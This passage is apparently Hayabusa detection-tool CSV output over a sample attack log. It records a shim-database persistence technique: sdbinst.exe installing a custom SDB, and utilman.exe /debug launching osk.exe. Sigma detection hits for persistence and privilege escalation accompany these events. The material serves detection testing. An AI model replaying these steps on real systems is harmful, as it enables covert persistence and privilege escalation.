365ABB72-543D-5C91-0000-001099A60300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:38.654 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3068 | PGUID: 365ABB72-543E-5C91-0000-001009C90300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:38.704 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\PSEXESVC.exe"" | Process: C:\Windows\PSEXESVC.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3080 | PGUID: 365ABB72-543E-5C91-0000-001096D00300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:38.774 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: msg * ""hello from run key"" | Process: C:\Windows\System32\msg.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | LID: 0x33435 | PID: 3144 | PGUID: 365ABB72-543E-5C91-0000-001071E70300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:43:24.560 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" | Process: C:\Program Files\Windows Media Player\wmpnetwk.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 3628 | PGUID: 
365ABB72-546C-5C91-0000-00106A730400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:46:04.916 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2336 | PGUID: 365ABB72-550C-5C91-0000-001063E60400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:46:20.518 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | Process: C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 2704 | PGUID: 365ABB72-551C-5C91-0000-001030590500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:46:25.856 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 1036 | PGUID: 365ABB72-5290-5C91-0000-0010E6D10000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:47:56.436 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\cmd.exe | Process: C:\Windows\Explorer.EXE | PID: 2984 | PGUID: 365ABB72-543D-5C91-0000-001099A60300,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.439 
+09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2112 | PGUID: 365ABB72-55A1-5C91-0000-0010AB8C0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.459 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{4f02f780-dd6c-40e3-ab21-c1336815b4db}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2112 | PGUID: 365ABB72-55A1-5C91-0000-0010AB8C0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.459 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.459 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.499 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim 
DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.499 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.499 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.509 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.559 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3724 | PGUID: 365ABB72-55A1-5C91-0000-0010F48F0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.559 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3724 | PGUID: 365ABB72-55A1-5C91-0000-0010F48F0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.860 
+09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3612 | PGUID: 365ABB72-55A1-5C91-0000-00102D930700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2368 | PGUID: 365ABB72-55A1-5C91-0000-0010D6960700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.920 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3404 | PGUID: 365ABB72-55A1-5C91-0000-00101D9B0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.930 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3404 | PGUID: 
365ABB72-55A1-5C91-0000-00101D9B0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:36.644 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3004 | PGUID: 365ABB72-55A4-5C91-0000-00103DA60700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2236 | PGUID: 365ABB72-55D7-5C91-0000-001067BD0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.807 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{d2c22380-b7b0-4d3a-b36e-bb0e804c265c}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2236 | PGUID: 365ABB72-55D7-5C91-0000-001067BD0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.807 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default 
Directory,,rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.807 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.857 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.857 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.857 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.867 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.967 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3916 | PGUID: 
365ABB72-55D7-5C91-0000-0010DAC00700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.978 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3916 | PGUID: 365ABB72-55D7-5C91-0000-0010DAC00700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.988 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3908 | PGUID: 365ABB72-55D7-5C91-0000-0010DDC30700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3740 | PGUID: 365ABB72-55D8-5C91-0000-00108AC80700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3648 | PGUID: 365ABB72-55D8-5C91-0000-001060C90700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 
+2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:28.168 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3740 | PGUID: 365ABB72-55D8-5C91-0000-00108AC80700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:31.212 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 4024 | PGUID: 365ABB72-55DB-5C91-0000-001094D60700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 4052 | PGUID: 365ABB72-55E8-5C91-0000-001037DF0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 
05:49:44.802 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{bebe1bf6-4a2e-46ad-9266-3fbf73d269a4}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 4052 | PGUID: 365ABB72-55E8-5C91-0000-001037DF0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.802 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.802 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.822 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.822 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.822 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.832 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim 
DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.972 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 2668 | PGUID: 365ABB72-55E8-5C91-0000-0010A9E20700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.972 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2668 | PGUID: 365ABB72-55E8-5C91-0000-0010A9E20700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.982 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2108 | PGUID: 365ABB72-55E8-5C91-0000-0010AEE50700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:45.152 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3956 | PGUID: 365ABB72-55E9-5C91-0000-00105BEA0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:45.162 
+09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2104 | PGUID: 365ABB72-55E9-5C91-0000-00102EEB0700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:45.172 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3956 | PGUID: 365ABB72-55E9-5C91-0000-00105BEA0700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:47.245 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2568 | PGUID: 365ABB72-55EB-5C91-0000-001076F60700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:51:05.017 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 612 | PGUID: 
365ABB72-5638-5C91-0000-0010651A0800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3896 | PGUID: 365ABB72-5689-5C91-0000-0010543F0800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.953 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{7146b11e-ec78-4046-b854-9c9bdc68691e}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 3896 | PGUID: 365ABB72-5689-5C91-0000-0010543F0800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.953 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.953 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim 
DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.973 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.973 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.973 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:52:25.983 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or 